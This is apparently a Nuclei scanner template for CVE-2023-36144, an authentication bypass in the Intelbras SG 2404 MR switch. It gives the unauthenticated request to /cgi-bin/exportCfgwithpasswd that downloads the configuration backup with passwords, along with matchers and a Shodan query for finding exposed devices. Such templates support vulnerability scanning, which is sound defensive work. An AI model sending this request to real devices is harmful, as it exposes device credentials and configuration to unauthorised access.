id: CVE-2023-36144 info: name: Intelbras Switch - Information Disclosure author: gy741 severity: high description: | An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-36144 - https://github.com/leonardobg/CVE-2023-36144 - http://intelbras.com - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-36144 cwe-id: CWE-862 epss-score: 0.02858 epss-percentile: 0.90492 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware shodan-query: title:"Intelbras" tags: cve2023,cve,intelbras,switch,exposure http: - method: GET path: - '{{BaseURL}}/cgi-bin/exportCfgwithpasswd' matchers-condition: and matchers: - type: word part: body words: - 'System Description' - 'System Version' - 'System Name' condition: and - type: word part: header words: - 'attachment;filename=' - type: status status: - 200 # digest: 4b0a00483046022100c87539b230266de86c5cb08d7a6ad9aaaeb4263821230046e194e05e8a0174c4022100f43f59553b68b72f32bd7190982615fd429469fe92dedf5ac1147322a2b44bf9:922c64590222798bb761d5b6d8e72950